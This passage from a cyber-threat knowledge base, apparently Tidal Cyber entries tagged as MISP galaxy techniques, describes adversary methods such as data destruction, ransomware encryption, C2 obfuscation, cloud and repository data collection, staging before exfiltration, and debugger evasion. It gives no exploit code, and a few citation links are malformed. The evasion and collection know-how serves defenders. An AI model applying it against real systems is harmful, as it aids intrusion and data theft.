Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.<sup>[[Symantec Shamoon 2012](https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)]</sup><sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup><sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup><sup>[[Unit 42 Shamoon3 2018](https://app.tidalcyber.com/references/c2148166-faf4-4ab7-a37e-deae0c88c08d)]</sup><sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup> Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://app.tidalcyber.com/technique/761fa7fa-d7e1-4796-85b3-5cd37d55dffa) and [Disk Structure Wipe](https://app.tidalcyber.com/technique/14a944d3-ab95-40d8-b069-ccc4824ef46d) because individual files are destroyed rather than sections of a storage disk or the disk’s logical structure.

Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.<sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup><sup>[[Unit 42 Shamoon3 2018](https://app.tidalcyber.com/references/c2148166-faf4-4ab7-a37e-deae0c88c08d)]</sup> In some cases politically oriented image files have been used to overwrite data.<sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup><sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup>

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and [SMB/Windows Admin Shares]([Symantec Shamoon 2012(https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)]</sup><sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup><sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup><sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup>.

In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.<sup>[[Data Destruction - Threat Post](https://app.tidalcyber.com/references/97d16d3a-98a0-4a7d-9f74-8877c8088ddf)]</sup><sup>[[DOJ - Cisco Insider](https://app.tidalcyber.com/references/b8d9006d-7466-49cf-a70e-384edee530ce)]</sup>

The tag is: misp-galaxy:technique="Data Destruction"

Non-Standard Encoding

Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.<sup>[[Wikipedia Binary-to-text Encoding](https://app.tidalcyber.com/references/9b3820e8-f094-4e87-9ed6-ab0207d509fb)]</sup> <sup>[[Wikipedia Character Encoding](https://app.tidalcyber.com/references/3e7df20f-5d11-4102-851f-04e89c25d12f)]</sup>

The tag is: misp-galaxy:technique="Non-Standard Encoding"

Standard Encoding

Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.<sup>[[Wikipedia Binary-to-text Encoding](https://app.tidalcyber.com/references/9b3820e8-f094-4e87-9ed6-ab0207d509fb)]</sup><sup>[[Wikipedia Character Encoding](https://app.tidalcyber.com/references/3e7df20f-5d11-4102-851f-04e89c25d12f)]</sup> Some data encoding systems may also result in data compression, such as gzip.

The tag is: misp-galaxy:technique="Standard Encoding"

Data Encoding

Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.<sup>[[Wikipedia Binary-to-text Encoding](https://app.tidalcyber.com/references/9b3820e8-f094-4e87-9ed6-ab0207d509fb)]</sup> <sup>[[Wikipedia Character Encoding](https://app.tidalcyber.com/references/3e7df20f-5d11-4102-851f-04e89c25d12f)]</sup> Some data encoding systems may also result in data compression, such as gzip.

The tag is: misp-galaxy:technique="Data Encoding"

Data Encrypted for Impact

Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.<sup>[[US-CERT Ransomware 2016](https://app.tidalcyber.com/references/866484fa-836d-4c5b-bbad-3594ef60599c)]</sup><sup>[[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]</sup><sup>[[US-CERT NotPetya 2017](https://app.tidalcyber.com/references/6a009850-834b-4178-9028-2745921b6743)]</sup><sup>[[US-CERT SamSam 2018](https://app.tidalcyber.com/references/b9d14fea-2330-4eed-892c-b4e05a35d273)]</sup>

In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://app.tidalcyber.com/technique/cb2e4822-2529-4216-b5b8-75158c5f85ff) or [System Shutdown/Reboot](https://app.tidalcyber.com/technique/24787dca-6afd-4ab3-ab6c-32e9486ec418), in order to unlock and/or gain access to manipulate these files.<sup>[[CarbonBlack Conti July 2020](https://app.tidalcyber.com/references/3c3a6dc0-66f2-492e-8c9c-c0bcca73008e)]</sup> In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.<sup>[[US-CERT NotPetya 2017](https://app.tidalcyber.com/references/6a009850-834b-4178-9028-2745921b6743)]</sup>

To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and [SMB/Windows Admin Shares]([FireEye WannaCry 2017(https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]</sup><sup>[[US-CERT NotPetya 2017](https://app.tidalcyber.com/references/6a009850-834b-4178-9028-2745921b6743)]</sup> Encryption malware may also leverage [Internal Defacement](https://app.tidalcyber.com/technique/546a3318-0e03-4b22-95f5-c02ff69a4ebf), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").<sup>[[NHS Digital Egregor Nov 2020](https://app.tidalcyber.com/references/92f74037-2a20-4667-820d-2ccc0e4dbd3d)]</sup>

In cloud environments, storage objects within compromised accounts may also be encrypted.<sup>[[Rhino S3 Ransomware Part 1](https://app.tidalcyber.com/references/bb28711f-186d-4101-b153-6340ce826343)]</sup>

The tag is: misp-galaxy:technique="Data Encrypted for Impact"

Data from Cloud Storage

Adversaries may access data from cloud storage.

Many IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 and Google Workspace provide cloud-based document storage to users through services such as OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use case of their platform.

In some cases, as with IaaS-based cloud storage, there exists no overarching application (such as SQL or Elasticsearch) with which to interact with the stored objects: instead, data from these solutions is retrieved directly though the [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5). In SaaS applications, adversaries may be able to collect this data directly from APIs or backend cloud storage objects, rather than through their front-end application or interface (i.e., [Data from Information Repositories](https://app.tidalcyber.com/technique/08a73f37-a04e-46be-9409-b330cbe291b4)).

Adversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.<sup>[[Amazon S3 Security, 2019](https://app.tidalcyber.com/references/4c434ca5-2544-45e0-82d9-71343d8aa960)]</sup><sup>[[Microsoft Azure Storage Security, 2019](https://app.tidalcyber.com/references/95bda448-bb13-4fa6-b663-e48a9d1b866f)]</sup><sup>[[Google Cloud Storage Best Practices, 2019](https://app.tidalcyber.com/references/752ad355-0f10-4c8d-bad8-42bf2fc75fa0)]</sup> There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions.

This open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.<sup>[[Trend Micro S3 Exposed PII, 2017](https://app.tidalcyber.com/references/1ba37b48-1219-4f87-af36-9bdd8d6265ca)]</sup><sup>[[Wired Magecart S3 Buckets, 2019](https://app.tidalcyber.com/references/47fb06ed-b4ce-454c-9bbe-21b28309f351)]</sup><sup>[[HIPAA Journal S3 Breach, 2017](https://app.tidalcyber.com/references/b0fbf593-4aeb-4167-814b-ed3d4479ded0)]</sup><sup>[[Rclone-mega-extortion_05_2021](https://app.tidalcyber.com/references/9b492a2f-1326-4733-9c0e-a9454bf7fabb)]</sup>

Adversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.

The tag is: misp-galaxy:technique="Data from Cloud Storage"

Network Device Configuration Dump

Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.

Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.<sup>[[US-CERT TA18-106A Network Infrastructure Devices 2018](https://app.tidalcyber.com/references/8fdf280d-680f-4b8f-8fb9-6b3118ec3983)]</sup><sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup> These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis.

The tag is: misp-galaxy:technique="Network Device Configuration Dump"

SNMP (MIB Dump)

Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).

The MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages<sup>[[SANS Information Security Reading Room Securing SNMP Securing SNMP](https://app.tidalcyber.com/references/616c9177-ca57-45f3-a613-d6450a94697d)]</sup>. The MIB may also contain device operational information, including running configuration, routing table, and interface details.

Adversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup>

The tag is: misp-galaxy:technique="SNMP (MIB Dump)"

Data from Configuration Repository

Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.

Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[US-CERT TA17-156A SNMP Abuse 2017](https://app.tidalcyber.com/references/82b814f3-2853-48a9-93ff-701d16d97535)]</sup>

The tag is: misp-galaxy:technique="Data from Configuration Repository"

Code Repositories - Duplicate

Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.

Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software’s source code. Having access to software’s source code may allow adversaries to develop [Exploits](https://app.tidalcyber.com/technique/5a57d258-0b23-431b-b50e-3150d2c0e52c), while credentials may provide access to additional resources using [Valid Accounts]([Wired Uber Breach(https://app.tidalcyber.com/references/3bdf88b3-8f41-4945-9292-e299bab4f98e)]</sup><sup>[[Krebs Adobe](https://app.tidalcyber.com/references/bc2b0b89-e00d-4beb-bf27-fe81d8c826a4)]</sup>

Note: This is distinct from [Code Repositories](https://app.tidalcyber.com/technique/2e4201da-fe83-439d-9d40-87e4c1f832fb), which focuses on conducting [Reconnaissance](https://app.tidalcyber.com/tactics/2706dc98-724b-4cf0-84b6-56cc20b0698e) via public code repositories.

The tag is: misp-galaxy:technique="Code Repositories - Duplicate"

Confluence

Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:

  • Policies, procedures, and standards

  • Physical / logical network diagrams

  • System architecture diagrams

  • Technical system documentation

  • Testing / development credentials

  • Work / project schedules

  • Source code snippets

  • Links to network shares and other internal resources

The tag is: misp-galaxy:technique="Confluence"

Sharepoint

Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:

  • Policies, procedures, and standards

  • Physical / logical network diagrams

  • System architecture diagrams

  • Technical system documentation

  • Testing / development credentials

  • Work / project schedules

  • Source code snippets

  • Links to network shares and other internal resources

The tag is: misp-galaxy:technique="Sharepoint"

Data from Information Repositories

Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization.

The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:

  • Policies, procedures, and standards

  • Physical / logical network diagrams

  • System architecture diagrams

  • Technical system documentation

  • Testing / development credentials

  • Work / project schedules

  • Source code snippets

  • Links to network shares and other internal resources

Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://app.tidalcyber.com/technique/8ac6952d-5add-4cbc-ad39-44943ed3459b) and [Confluence](https://app.tidalcyber.com/technique/3cc64d61-7922-4e08-98ff-b76cb2173830), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.

The tag is: misp-galaxy:technique="Data from Information Repositories"

Data from Local System

Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.

Adversaries may do this using a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c), such as [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) as well as a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907), which have functionality to interact with the file system to gather information.<sup>[[show_run_config_cmd_cisco](https://app.tidalcyber.com/references/5a68a45a-a53e-5d73-a82a-0cc951071aef)]</sup> Adversaries may also use [Automated Collection](https://app.tidalcyber.com/technique/107ad6c5-79b1-468c-9519-1578bee2ac49) on the local system.

The tag is: misp-galaxy:technique="Data from Local System"

Data from Network Shared Drive

Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) may be used to gather information.

The tag is: misp-galaxy:technique="Data from Network Shared Drive"

Data from Removable Media

Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) may be used to gather information.

Some adversaries may also use [Automated Collection](https://app.tidalcyber.com/technique/107ad6c5-79b1-468c-9519-1578bee2ac49) on removable media.

The tag is: misp-galaxy:technique="Data from Removable Media"

Runtime Data Manipulation

Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.<sup>[[FireEye APT38 Oct 2018](https://app.tidalcyber.com/references/7c916329-af56-4723-820c-ef932a6e3409)]</sup><sup>[[DOJ Lazarus Sony 2018](https://app.tidalcyber.com/references/950f8c1e-8793-43b7-abc7-0c9f6790b3b7)]</sup> By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://app.tidalcyber.com/technique/9cfbe3ba-957e-49fd-9494-9870e5d0ae16) and [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:technique="Runtime Data Manipulation"

Stored Data Manipulation

Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.<sup>[[FireEye APT38 Oct 2018](https://app.tidalcyber.com/references/7c916329-af56-4723-820c-ef932a6e3409)]</sup><sup>[[DOJ Lazarus Sony 2018](https://app.tidalcyber.com/references/950f8c1e-8793-43b7-abc7-0c9f6790b3b7)]</sup> By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:technique="Stored Data Manipulation"

Transmitted Data Manipulation

Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.<sup>[[FireEye APT38 Oct 2018](https://app.tidalcyber.com/references/7c916329-af56-4723-820c-ef932a6e3409)]</sup><sup>[[DOJ Lazarus Sony 2018](https://app.tidalcyber.com/references/950f8c1e-8793-43b7-abc7-0c9f6790b3b7)]</sup> By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:technique="Transmitted Data Manipulation"

Data Manipulation

Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.

The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:technique="Data Manipulation"

Junk Data

Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters.

The tag is: misp-galaxy:technique="Junk Data"

Protocol Impersonation

Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic.

Adversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity.

The tag is: misp-galaxy:technique="Protocol Impersonation"

Steganography - Duplicate

Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control.

The tag is: misp-galaxy:technique="Steganography - Duplicate"

Data Obfuscation

Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.

The tag is: misp-galaxy:technique="Data Obfuscation"

Local Data Staging

Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://app.tidalcyber.com/technique/ebd3f870-c513-4fb0-b133-15ffc1f91db2). Interactive command shells may be used, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) and bash may be used to copy data into a staging location.

Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.<sup>[[Prevailion DarkWatchman 2021](https://app.tidalcyber.com/references/449e7b5c-7c62-4a63-a676-80026a597fc9)]</sup>

The tag is: misp-galaxy:technique="Local Data Staging"

Remote Data Staging

Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://app.tidalcyber.com/technique/ebd3f870-c513-4fb0-b133-15ffc1f91db2). Interactive command shells may be used, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) and bash may be used to copy data into a staging location.

In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://app.tidalcyber.com/technique/2ba8a662-6930-4cbe-9e3d-4cbe2109fd88) and stage data in that instance.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>

By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.

The tag is: misp-galaxy:technique="Remote Data Staging"

Data Staged

Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://app.tidalcyber.com/technique/ebd3f870-c513-4fb0-b133-15ffc1f91db2). Interactive command shells may be used, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) and bash may be used to copy data into a staging location.<sup>[[PWC Cloud Hopper April 2017](https://app.tidalcyber.com/references/fe741064-8cd7-428b-bdb9-9f2ab7e92489)]</sup>

In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://app.tidalcyber.com/technique/2ba8a662-6930-4cbe-9e3d-4cbe2109fd88) and stage data in that instance.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>

Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.

The tag is: misp-galaxy:technique="Data Staged"

Data Transfer Size Limits

An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.

The tag is: misp-galaxy:technique="Data Transfer Size Limits"

Debugger Evasion

Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.<sup>[[ProcessHacker Github](https://app.tidalcyber.com/references/3fc82a92-cfba-405d-b30e-22eba69ab1ee)]</sup>

Debugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.

Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).<sup>[[hasherezade debug](https://app.tidalcyber.com/references/53b0c71d-c577-40e8-8a04-9de083e276a2)]</sup><sup>[[AlKhaser Debug](https://app.tidalcyber.com/references/d9773aaf-e3ec-4ce3-b5c8-1ca3c4751622)]</sup><sup>[[vxunderground debug](https://app.tidalcyber.com/references/8c7fe2a2-64a1-4680-a4e6-f6eefe00407a)]</sup>

Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) function calls such as <code>OutputDebugStringW()</code>.<sup>[[wardle evilquest partii](https://app.tidalcyber.com/references/4fee237c-c2ec-47f5-b382-ec6bd4779281)]</sup><sup>[[Checkpoint Dridex Jan 2021](https://app.tidalcyber.com/references/a988084f-1a58-4e5b-a616-ed31d311cccf)]</sup>

The tag is: misp-galaxy:technique="Debugger Evasion"

External Defacement

An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://app.tidalcyber.com/technique/26db57d5-ce6f-4487-a8a8-b4af1c4b6406) may ultimately cause users to distrust the systems and to question/discredit the system’s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.<sup>[[FireEye Cyber Threats to Media Industries](https://app.tidalcyber.com/references/7b9bd753-01b7-4923-9964-19c59123ace2)]</sup><sup>[[Kevin Mandia Statement to US Senate Committee on Intelligence](https://app.tidalcyber.com/references/c40a3f96-75f4-4b1c-98a5-cb38129c6dc4)]</sup><sup>[[Anonymous Hackers Deface Russian Govt Site](https://app.tidalcyber.com/references/ca63ccd4-8c81-4de6-8eb4-06a6c68ce4d3)]</sup> [External Defacement](https://app.tidalcyber.com/technique/26db57d5-ce6f-4487-a8a8-b4af1c4b6406) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise]([Trend Micro Deep Dive Into Defacement(https://app.tidalcyber.com/references/4886418b-3a2e-4f12-b91e-3bb2a8134112)]</sup>

The tag is: misp-galaxy:technique="External Defacement"

Internal Defacement

An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.<sup>[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]</sup> Disturbing or offensive images may be used as a part of [Internal Defacement](https://app.tidalcyber.com/technique/546a3318-0e03-4b22-95f5-c02ff69a4ebf) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary’s presence, it often takes place after other intrusion goals have been accomplished.<sup>[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]</sup>

The tag is: misp-galaxy:technique="Internal Defacement"

Defacement

Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://app.tidalcyber.com/technique/9a21c7c7-cf8e-4f05-b196-86ec39653e3b) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://app.tidalcyber.com/technique/9a21c7c7-cf8e-4f05-b196-86ec39653e3b) in order to cause user discomfort, or to pressure compliance with accompanying messages.

The tag is: misp-galaxy:technique="Defacement"

Deobfuscate/Decode Files or Information

Adversaries may use [Obfuscated Files or Information](https://app.tidalcyber.com/technique/046cc07e-8700-4536-9c5b-6ecb384f52b0) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.

